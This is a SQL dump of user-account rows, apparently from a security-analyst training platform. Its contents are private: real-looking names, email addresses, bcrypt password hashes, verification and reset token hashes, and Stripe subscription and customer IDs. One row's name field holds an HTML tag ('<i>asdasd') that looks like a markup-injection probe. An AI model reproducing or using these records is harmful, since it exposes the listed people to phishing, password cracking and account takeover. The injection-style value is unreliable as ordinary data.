(15, NULL, 'Charaf', 'charafmourad1979@gmail.com', '$2a$10$pa34YShTEbOQyRkMfM5MQujqxAdOyfxpldKR9PCc4ocGcp1hZiI/y', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-17 20:30:59', 'Charaf Mourad', 'Mourad', 0, 'c6449a8275d6cfe3ddbac37dedc326de68f227b838ff5a8c68676eb8f796179f', NULL, NULL, 0, NULL, NULL, '2025-12-17 17:30:59', NULL, 1, 0, NULL, NULL, NULL, NULL),
(16, NULL, 'Michael', 'harleycoplan7@hotmail.com', '$2a$10$drUDZsP4zZn82pno3TZFHeK3haIOn/thxwmAPujjLBdJXvbNffQOq', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-17 20:36:33', 'Michael7', 'Coplan', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-17 17:36:33', NULL, 2, 0, NULL, NULL, NULL, NULL),
(17, NULL, 'Nic', 'bnicolepeeples@icloud.com', '$2a$10$YFtWqBYyIVj6xa8YNL1bL.ckFR7HmVLGZnsQYZTtbTP6P3P3fE44y', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-17 20:45:52', 'Nicpeeps', 'Peeps', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-17 17:45:52', NULL, 1, 0, NULL, NULL, NULL, NULL),
(18, NULL, '<i>asdasd', 'xmglcalwxppluopcgf@enotj.com', '$2a$10$f97OaLfPTnr1JPWsWWIOweT/lPFGS7SZHhEuRlh.YzCdVNchOiaH2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-17 22:10:54', 'xmglcalwxppluopcgf@enotj.com', '<i>asdasd', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-17 19:10:54', NULL, 4, 1, NULL, NULL, NULL, NULL),
(19, NULL, 'Salah', 'salah_22313@hotmail.com', '$2a$10$DVie6qZhvrnxJGLnL59Wx.c.M0rHvZzcWU30i3wgu/iPmqs2YCnBO', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-17 22:52:02', 'salahali', 'Ali', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-17 19:52:02', NULL, 2, 0, NULL, NULL, NULL, NULL),
(20, NULL, 'Elif', 'newpathtocyber@gmail.com', '$2a$10$lV8pgm.FuoczEHu4uc3lp.DuFt7rCD5OYQKJFRLEwGI/NQMC6wz8i', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-18 02:22:14', 'elif', 'yilmaz', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-17 23:22:14', NULL, 4, 1, NULL, NULL, NULL, NULL),
(21, NULL, 'Muhammad ', 'hamzam9878@gmail.com', '$2a$10$XWnohhivsKxqlVnU595qCOSQD2fHr786rC8O6p3vA0febylQtG2uO', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-18 03:07:17', 'hamzam9878@gmail.com', 'Hamza', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-18 00:07:17', NULL, 1, 0, NULL, NULL, NULL, NULL),
(22, NULL, 'Alex', 'alec.aextecki@gmail.com', '$2a$10$2cWyxgquQCtGY.7bHgjeRuqq0Jd7/dxhf/x9uAtFJr1AjIO9gK24a', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 2, '2025-12-18 03:43:57', 'aextecki', 'Mortel', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-18 00:43:57', NULL, 4, 1, NULL, NULL, NULL, NULL),
(23, NULL, 'Ryan', 'ryanmarkyecyec17@gmail.com', '$2a$10$YmUNDov3vnxzkAYH8GPDS.Ykiq5Pq8/WKoODN.0c26usDHkvCB8uO', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-18 06:47:44', 'realryan17', 'Yecyec', 0, '726fd9ae1ab59ad9969e3d3a6b87a75f09788ee242a346885751acaafee8cadb', NULL, NULL, 0, NULL, NULL, '2025-12-18 03:47:44', NULL, 2, 0, NULL, NULL, NULL, NULL),
(24, NULL, 'Gergana ', 'german4eto@gmail.com', '$2a$10$oaFNOjCfqCHmoQbyRd7aFOpH1uA6xUyX8IfzTwMMrNo6rXbjVebre', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-18 07:03:48', 'gerimira', 'Hristova', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-18 04:03:48', NULL, 4, 1, NULL, NULL, NULL, NULL),
(25, NULL, 'Serdar', 'cavdarsean@gmail.com', '$2a$10$iNByg/2PE5RXS4hjMyi9huMOzAmdtWJAeEQCXkkLCmYlkDhnJprjC', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-18 23:39:40', 'CavdarSean', 'Cavdar', 0, '61b9ad8cde07c0f08922642a9e2473a7a9db8b75dab54213bed7c1112ee153c5', NULL, NULL, 0, NULL, NULL, '2025-12-18 20:39:40', NULL, 2, 0, NULL, NULL, NULL, NULL),
(27, NULL, 'HAKAN', 'hakancok@gmail.com', '$2a$10$Zu88Q23hZFR5U0eCSMv2Be1afxiVrZQQbsrHHt2..KiCSQIbcLC4K', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-21 03:00:20', 'hakan', 'ASLAN', 0, '1a7609aa1d3b30a9d69489e37f00b4608b5f56b5d8a36b099eb6a2661587efa8', NULL, NULL, 0, NULL, NULL, '2025-12-21 00:00:20', NULL, 4, 1, NULL, NULL, NULL, NULL),
(28, NULL, 'Geo', 'skegeo@yahoo.com', '$2a$10$6xZkrZMxZXzzGoBte7O/u.JcuS6X3UNI2agh/kZCncWC1DnYNUQAK', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-22 01:42:48', 'skegeo', 'Ske', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-21 22:42:48', NULL, 1, 0, NULL, NULL, NULL, NULL),
(29, NULL, 'Daniel', 'daweda@wgu.edu', '$2a$10$1D5n1h0FkpLZk1CrnN4OJu19ZwkIeWWWojYQ.OFIV.EaeaoTSlwXK', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-23 20:25:10', 'daweda4321', 'Aweda', 0, '9d59bc2e10faea2d550b16d0c169e5199a1cb300c5f7a1f499ef7dc5941fb648', NULL, NULL, 0, NULL, NULL, '2025-12-23 17:25:10', NULL, 1, 0, NULL, NULL, NULL, NULL),
(30, NULL, 'ayoub', 'ayoub941settou@gmail.com', '$2a$10$/5yIrpAlrwJjR/YDbUWd4uQyGwgL7OGSiZNYi99J.NPb7keAKK7uq', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 2, '2025-12-24 00:16:43', 'vuxc', 'kohi', 0, 'ec980894481a10d6fd73923d8f5470b253cbed50540fe5fb04bb8281db02420c', NULL, NULL, 0, NULL, NULL, '2025-12-23 21:16:43', NULL, 1, 0, NULL, NULL, NULL, NULL),
(31, NULL, 'Bahmed', 'aa587055@gmail.com', '$2a$10$L/G0K5O9be/JwE1uRiXkvuvn4Ho2kZVC5hW/rcQVP9AP0XWRJnZ8.', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-24 04:19:12', 'm.bahmed', 'Bahmed', 0, '6cc7b70fbc5fa3b39bd36271498af5703503ae55d4331f66697532a9949a5b5e', NULL, NULL, 0, NULL, NULL, '2025-12-24 01:19:12', NULL, 1, 0, NULL, NULL, NULL, NULL),
(32, NULL, 'Gurkan', 'mylife12.gra@gmail.com', '$2a$10$G/btHQMnO72Jx/eEe0rM.Osu29AaEtNpjWQWBlmwtApXkQVJMylle', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-25 01:08:48', 'lifeadam', 'Akbaba', 0, '06c11df01e7cc60027c5194cc97a203cc286525ce83bdc68abd8c5f33abb57c6', NULL, NULL, 0, NULL, NULL, '2025-12-24 22:08:48', NULL, 1, 0, NULL, NULL, NULL, NULL),
(34, NULL, 'Jacob', 'jacob109@infoseclabs.io', '$2a$10$xhEZW.s7vvgw81SV/2vkp.eInLWcMLgfFulVcv3FHDrrNiES6KceS', 'normal', NULL, 'pro', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2025-12-25 23:03:58', 'jacob', 'Myfield', 1, 'bd902b38b615ba7100347f9a54839416a5ceb1201cddcb8d949c2797cd65e640', NULL, NULL, 0, NULL, '[{\"id\":\"golden_analyst\",\"name\":\"Golden Analyst\",\"awarded_at\":\"2026-01-01T21:15:34.548Z\",\"description\":\"Awarded for 1st Place in the monthly leaderboard (Gold).\",\"type\":\"gold\"}]', '2025-12-25 20:03:58', NULL, 1, 0, '{\"weekly_report\":false,\"alert_assigned\":false,\"investigation_graded\":false,\"newsletter\":false}', 'a16697c938e65392c70e8ccbb075fcfb4dce8b55f226c1dbb03ac4fba79a9c74', 'SIEM', NULL),
(35, NULL, 'Abdul Wakil', 'ZAMANI.ABDWAKIL@GMAIL.COM', '$2a$10$cqRl7Y7u0.tBoJh6E6EnauvTgzh9FmhLcgV1QZgsG9PZpGoHWQZT2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-26 08:26:47', 'ZAMANI.ABDWAKIL@GMAIL.COM', 'Zamani', 0, '4ed9b035149c0648360a071923b5b77cc558e6ad8b32a531363cf0a23efd5da6', NULL, NULL, 0, NULL, NULL, '2025-12-26 05:26:47', NULL, 1, 0, NULL, NULL, NULL, NULL),
(36, NULL, 'damon', 'doc@productsolutions.shop', '$2a$10$oSMRz7wRmgyZ8POOgRVb9e2zpeqTk1A/BeXwoAMI7oF2aYhA/cc7y', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-26 16:50:08', 'PRODUCTS316', 'hunley', 0, 'b3f6cff078258ab7a492c062b8d41f2e293525c5535849aacdaa29aeb968ffaa', NULL, NULL, 0, NULL, NULL, '2025-12-26 13:50:08', NULL, 1, 0, NULL, NULL, NULL, NULL),
(37, NULL, 'kurt', 'kurtd0676@gmail.com', '$2a$10$XOGM0RsE14DGd0FO2ZjVs.O71fn4sZUwZpNqGkVHwoonS13c7k6NC', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-26 21:39:36', 'kurt', 'Kurt', 0, '1bfb2d0be9b311d73f46412d2dfcc5cc07e9a7452fba6f75a42fe82ccaae897d', NULL, NULL, 0, NULL, NULL, '2025-12-26 18:39:36', NULL, 1, 0, NULL, NULL, NULL, NULL),
(38, NULL, 'Julius', 'juliusrabacajr0015@gmail.com', '$2a$10$GNr78tVehzrAlKS3yT9EL.WD5hREfuIW4LmULkG19iYcg6IhfsTVG', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-27 04:55:58', 'R0b0t0015', 'Rabaca Jr', 0, 'cf2ea36f6951dbc0c0c6b03c20284351c6235fae7df86b78dda96be6a5620f80', NULL, NULL, 0, NULL, NULL, '2025-12-27 01:55:58', NULL, 1, 0, NULL, NULL, NULL, NULL),
(39, NULL, 'Pranith', 'zyrenic@cc.cc', '$2a$10$zs0UdjQyPXyIuyO/GlHZI.YBgMlnW0lvH6LLV4lsIS1mLFCoEEct2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-27 06:56:25', 'xenoz84', 'Jain ', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-27 03:56:25', NULL, 1, 0, NULL, NULL, NULL, NULL),
(40, NULL, 'Nathalia', 'nathaliabolinja@gmail.com', '$2a$10$nSLd.6e0I9v1ffUr6LvFWulvdOTe7M/vrpiQZtozVZRH.NzYLRlM.', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-27 07:13:07', 'nbj', 'Bolinja', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-27 04:13:07', NULL, 1, 0, NULL, NULL, NULL, NULL),
(41, NULL, 'Sam', 'samrock0588@gmail.com', '$2a$10$zxrRXlCZ2sVKAUE5Tl9iOuctKzSj8NRQa7HdnDiakeYsdyiBQAZ3K', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2025-12-27 13:28:37', 'samrock89', 'Rock', 1, NULL, NULL, NULL, 0, NULL, '[{\"id\":\"bronze_analyst\",\"name\":\"Bronze Analyst\",\"awarded_at\":\"2026-01-01T21:15:34.789Z\",\"description\":\"Awarded for 3rd Place in the monthly leaderboard (Bronze).\",\"type\":\"bronze\"}]', '2025-12-27 10:28:37', NULL, 1, 0, NULL, NULL, NULL, NULL),
(42, NULL, 'Recep', 'recepercik@gmail.com', '$2a$10$mLouep1/nmKp6nDLAAaRHeLLwu9UiqpaJWKTddqfxwU1b5T1kiIqm', 'pro', NULL, 'yearly', 'active', 'sub_1SjwmvL5VKtXn66bwHdc4jQW', 'cus_ThLTNxhBJ7LUrI', 0, NULL, NULL, NULL, NULL, 1, '2025-12-27 14:49:51', 'Recc_SecX', 'Ercik', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-27 11:49:51', NULL, 1, 0, NULL, '400f18db54396122db9c3f27b3d4e00d543a49ed8dd10b8f0242c99a08e8e8e0', NULL, NULL),
(43, NULL, 'esmaeil', 'm.esmaeilkazemi@gmail.com', '$2a$10$VjSyopMt6nEy4wPyuycm5OYHP9l8Du.eF8YFu2KXnNNxFt1KgJ7IW', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-27 20:35:02', 'esmaeil', 'kazemi', 0, '11233473773a81ba96027ecd8a6f6dc955911eee0aac0fef02ad94d9f8042e97', NULL, NULL, 0, NULL, NULL, '2025-12-27 17:35:02', NULL, 1, 0, NULL, NULL, NULL, NULL),
(44, NULL, 'Denver ', 'info@infoseclabs.io', '$2a$10$ihc/XIpj7D.Y6OpgY6mUC.vFxCbr.jH/4a0Q/7nwugCwAJv14EpTC', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-27 23:59:18', 'Denver', 'Benim ', 1, 'ac2d5a96b8ac43d9b1b8b4b59f50e1f2233c13cc8dbe8665eb6afb8fe5ddbb73', NULL, NULL, 0, NULL, NULL, '2025-12-27 20:59:18', NULL, 1, 0, NULL, NULL, NULL, NULL),
(45, NULL, 'Faith', 'faithgambrill1990@gmail.com', '$2a$10$WlYfpKKH33nthaVBvjzay.3Cj732JXBEZfLAh4q5u5THZ.o2XFR.G', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-28 20:13:10', 'faithgamb', 'Gambrill', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-28 17:13:10', NULL, 1, 0, NULL, NULL, NULL, NULL),
(46, NULL, 'Willie', 'WILLIE.MAYES@GMAIL.COM', '$2a$10$UBJ1DH4t09l4TGgxmB1DxeIwl5XM5f6HGjtljA5ma5oxJsiQ5aJ3K', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-28 20:31:42', 'Blkmaze ', 'Mayes', 0, '2fb3acf3c8e493a721a3658ba5e3c42d876b62759936bc309494531baf2ece7c', NULL, NULL, 0, NULL, NULL, '2025-12-28 17:31:42', NULL, 1, 0, NULL, NULL, NULL, NULL),
(47, NULL, 'Mike', 'karmakaze27@gmail.com', '$2a$10$2By6y/1hT4.GrmxcTTji/Oa7CAfk3TS8Mtgm11jQ0ONZGXHJYwEWm', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-28 20:52:27', 'karmakaze27', 'Landona', 0, '7f4cdb2ee77b81fec6ce85f48d0c8c811db10ab98ae05658f3e421cfad695a4c', NULL, NULL, 0, NULL, NULL, '2025-12-28 17:52:27', NULL, 1, 0, NULL, NULL, NULL, NULL),
(48, NULL, 'David', 'hartwd78@gmail.com', '$2a$10$o67rx.04z7LFFQM6ugCsU.vrhGtoD62ExXgpq2X8.jU9UjdyFiZUq', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-28 22:32:16', 'Coffeegeek', 'Hart', 0, 'd2446af781848e43bd1dfbfaffc8d5746559701cc17970a9192f827c21573202', NULL, NULL, 0, NULL, NULL, '2025-12-28 19:32:16', NULL, 1, 0, NULL, NULL, NULL, NULL),
(49, NULL, 'Uzair', 'uzairalviis@gmail.com', '$2a$10$cgXmMT2pq8jQXzFwurXpVOaxIkKwrx7QplsChxopuIxRP.fq5kVVy', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-01-05 01:30:51', 'uzairalvi', 'Alvi', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-28 19:54:53', NULL, 1, 0, NULL, '708a3b53134b605c7660ead87e02e1abb4a8a4317a2ff75bc8ee579a13d1e644', NULL, NULL),
(50, NULL, 'Torrin', 'torrin.smith.ts@icloud.com', '$2a$10$wd5YB7fmPT0QLT.xLxX6WOMF3TexCcFnKLsIGjaKhZbRhRX4XP5DG', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-29 00:32:20', 'CloudSpanNetworks', 'Smith', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-28 21:32:20', NULL, 1, 0, NULL, 'be68f8397df78d474c2b7d73af095991e2b5d1126d72b43b88cef94fa780df25', NULL, NULL),
(51, NULL, 'Oscar', 'ojaime@infoseclabs.io', '$2a$10$K9eSXtVvNguHIzySt.v.Q.i3owXroEKpUzvDNXU43XXS71OKtREKm', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2025-12-29 00:55:57', 'oscar2025', 'Jaime', 1, '2a9fae3d956b0da3f110872a8af9ab3cb25412c5b9dd10068b6efd9ed6f635a3', NULL, NULL, 0, NULL, NULL, '2025-12-28 21:55:57', NULL, 1, 0, NULL, NULL, NULL, NULL),
(52, NULL, 'Roy ', 'roymcdnld89@gmail.com', '$2a$10$YqVcltNZvQyMpPkXCfG/xe0Pb/rBageehhvvECJKnVrEbtztCBLt6', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-29 03:28:27', 'Mac25', 'Mcdonald', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-29 00:28:27', NULL, 1, 0, NULL, 'e981efa731872d1eb4e9e6524eb0ab4a9e6f3468399f01a35b987a1f797311c1', NULL, NULL),
(53, NULL, 'Steven', 'Steviebsofly29@gmail.com', '$2a$10$Uvli/AGQM8w46wVetX5B8uouyjFsJdFWDnhTL6JBPiUWyQJpUiL3K', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-29 10:28:59', 'steviebsofly', 'Rodriguez', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-29 07:28:59', NULL, 1, 0, NULL, '57c25b557333904605e0da0c5fcf8524c77ab6dbbfd33d3b5d0de97ab91e0f52', NULL, NULL),
(54, NULL, 'Jentsey', 'jello6006@gmail.com', '$2a$10$UYQhHzOqSDIVM5EdXaNPJ.MQtq0RJ1aqPBuQ5xoJyccI7kqgmMtWa', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-01-03 19:56:37', 'Jentsey', 'Lucero', 1, NULL, NULL, NULL, 0, NULL, '[{\"id\":\"silver_analyst\",\"name\":\"Silver Analyst\",\"awarded_at\":\"2026-01-01T21:15:34.714Z\",\"description\":\"Awarded for 2nd Place in the monthly leaderboard (Silver).\",\"type\":\"silver\"}]', '2025-12-29 21:29:24', NULL, 1, 0, NULL, '686c458e010106dcb89f667b5b57f89e7c394c3b5591686cf6a0e48eaaa64446', NULL, NULL),
(55, NULL, 'Venetta', 'venettasmithen28@gmail.com', '$2a$10$qC/rx9kzLXscr2th2/gjn.X5F9D6xxA9HurEKhg1RSZyh.WOkkibK', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-31 04:11:22', 'Venettas', 'Smithen ', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-31 01:11:22', NULL, 1, 0, NULL, '86ecee3bf4b881768fe739596732c1cf4de04ade6dc4579799c444a3bbb7206b', NULL, NULL),
(56, NULL, 'dai', 'daichizan@twdzq.onmicrosoft.com', '$2a$10$HTJGk8cgl1/6S3E7D9pyBuQF4h7avgUcP4TeD5rdV5kTjpCDiiMd.', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 2, '2025-12-31 10:24:05', 'daichizan', 'chizan', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-31 07:24:05', NULL, 1, 0, '{\"weekly_report\":false,\"alert_assigned\":false,\"investigation_graded\":false,\"newsletter\":false}', '1e9a48eb89b07c76946070de24a5c10c68272f8f907c790e91dd7c45ade7d4b7', NULL, NULL),
(57, NULL, 'dai', 'daichizan1998@gmail.com', '$2a$10$tL60W5U2BnBchPlJtD4EheufcNQgJhzbVA544X5HwyRRiz7QYyeUy', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-31 10:24:26', 'daichizan', 'chizan', 0, '05fbafcb0ccafee085eb2176c7b30698a1ec94117975145652fc1091aef8bf75', NULL, NULL, 0, NULL, NULL, '2025-12-31 07:24:26', NULL, 1, 0, NULL, NULL, NULL, NULL),
(58, NULL, 'Ricardo', 'ricky.garcia.mail@gmail.com', '$2a$10$ZzpDnpA1rvKSmGRGXDAd2ufLqpKpOiSULjAESvofgBwLaz4W42d0S', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2025-12-31 17:33:15', 'geekyface', 'Garcia', 1, NULL, NULL, NULL, 0, NULL, NULL, '2025-12-31 14:33:15', NULL, 1, 0, NULL, NULL, NULL, NULL),
(59, NULL, 'Oscar', 'oscarjaimef@yahol.com.mx', '$2a$10$GkLbfxxonzEPzPk7jXei5uuXztsvLpTatiUHuBPPogGbd1GtY3GLa', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-02 00:33:27', 'oscar2026', 'Jaime', 0, '664e54f32651cd0fa04c58ed93a333af78d6ad11d8e740bb3ecd28285312bbca', NULL, NULL, 0, NULL, NULL, '2026-01-01 21:33:27', NULL, 1, 0, NULL, NULL, NULL, NULL),
(60, NULL, 'Lori', 'loriadam27@gmail.com', '$2a$10$aQASLPeMBmfx.pVn76EhHOASv5guDKaGj2OYcRFQMzbtNN/xmVVvm', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-02 03:49:19', 'loria25', 'Adam', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-02 00:49:19', NULL, 1, 0, NULL, '292dbcf67e23060ce399b0f04c4f21b84a63640321c25812149394c4e4b4e0f8', NULL, NULL),
(61, NULL, 'shiphrah', 'wairimashiphrah@gmail.com', '$2a$10$FrZ5AhpULMyeD175PgRnd.UPva1u.jx5oR/PmTv1WKl9lKZoQqAoy', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-02 09:46:41', 'VI', 'wairima', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-02 06:46:41', NULL, 1, 0, NULL, '47e0735ef6a83c998f50d67b5a1a2845073bda27a6ebbfd9349fcd794295cc86', NULL, NULL),
(62, NULL, 'Mohammed Al Sakini', 'iraqmoka@gmail.com', '$2a$10$a0V7rXUcmfFLh47KBTrKtOc53XHdS1cuC6GlJjTq3skX9.Cvjyxw2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-02 14:36:35', 'Moka ', 'Al Sakini', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-02 11:36:35', NULL, 1, 0, NULL, '940c70366e03157a6fa2fd10ccdcae0c8f411589be66ed1ec14c182a5346ebbb', NULL, NULL),
(63, NULL, 'Anis', 'anis86@hotmail.com', '$2a$10$I7MpKso2NslUYvNl2W3s3OMzg59BWz2gKj03h/DiaQLUycHOGgonK', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-03 00:09:29', 'Guria', 'Khan', 0, '9ee0482d6e0373d45795cadaab7580e14cf5ae6975318554584e6b6fb6d4a29d', '35376fda19207feeaee04be2bb100b6e7426854315755985973041e4f74264ef', '2026-01-03 02:10:09', 0, NULL, NULL, '2026-01-02 21:09:29', NULL, 1, 0, NULL, NULL, NULL, NULL),
(64, NULL, 'Mualla', 'mualladincer87@gmail.com', '$2a$10$fRpXNBlVcOhCxHb43iJq3eAtozJKQuAxi/ZSxukx/hPrO0s7qoJfa', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-01-04 00:32:47', 'mualladincer ', 'Dincer', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-03 21:32:47', NULL, 1, 0, NULL, '8bae2e42e0e6bf875227127eb3b771f4d28901440609100109e3f3a29236105f', NULL, NULL),
(65, NULL, 'Mohamed ', 'zssaul.inc@gmail.com', '$2a$10$rWyZuvqJ/GneKgUEhXQJKe96zdUkbbjS4ldIlqsS1CW/06uAeOihS', 'pro', NULL, 'monthly', 'active', 'sub_1SmTzpL5VKtXn66b6q2VkfrF', 'cus_TjxvpymtxyaqrC', 0, NULL, NULL, NULL, NULL, 0, '2026-01-06 09:39:54', 'Simo', 'zouitine', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-06 06:39:54', NULL, 1, 0, NULL, 'fc3a3d28c8e9ddf057376e6f5d1755e184fbd1ef18f4a56085a263629fea934c', NULL, NULL),
(66, NULL, 'Kabiru', 'adkasu26@gmail.com', '$2a$10$IVWNCU5vvc03OVsBhEQAIeX2Xl8LVjeRkpYfm32Asb30H1Mei1WAy', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-06 16:58:05', 'Kayfactorial ', 'Adio', 0, '2f4e2ce52e153ec0a086cd0849f46068863aae22f1cb96ad750a8cfb304dbb43', NULL, NULL, 0, NULL, NULL, '2026-01-06 13:58:05', NULL, 1, 0, NULL, NULL, NULL, NULL),
(67, NULL, 'Al', 'sec2200.txwcm@slmails.com', '$2a$10$XUlsLb/21VJz8wb63CelVuo89tjvgDL1CJM0b9QxlQdjYlaew.tea', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-07 06:07:05', 'al991', 'al', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-07 03:07:05', NULL, 1, 0, NULL, '3509b13d54b8105f320d9f13cfe3ebfaa955880c26fd813b096b91d268479620', NULL, NULL),
(68, NULL, 'Kiera', 'kierabona0@gmail.com', '$2a$10$4dCAXFMoX2s9RqiBzN23MeVXaZgZ9Pmb9QccOjXvCptGnsnmTYjlW', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-01-07 18:58:56', 'kierabon', 'Bonaparte', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-07 15:58:56', NULL, 1, 0, NULL, '8897163a3314e1aeb094cfe9af8dccbf71c1e66c797bf96808aea8b9c3993bf3', NULL, NULL),
(69, NULL, 'John', 'Jonathan.flores@calbrightcollege.org', '$2a$10$c7wZFxmK1kG0kqYUWGyxy.tw3bdqetEw4SQjDaqUBPYb7OuBi9VVq', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-08 01:45:50', 'DaProduct', 'Flores', 0, '4cf5915ada776dd833e2e6be98cf1bbb5336424f9c1fdb43eb04a5afb84d0da5', NULL, NULL, 0, NULL, NULL, '2026-01-07 22:45:50', NULL, 1, 0, NULL, NULL, NULL, NULL),
(70, NULL, 'chisom', 'chisomonyebuchi09@gmail.com', '$2a$10$AUEfcteEV3ASYyBdMm4B7ut82lhfWCS8D4r/H5hzrUgfcCWdMRAoW', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-08 17:51:54', 'kaycee', 'onyebuchi', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-08 14:51:54', NULL, 1, 0, NULL, '069ef124ae9ae1c7a6f7e3c69bb0f11fff7ba8e17ca970294a7fadf6fc45c715', NULL, NULL),
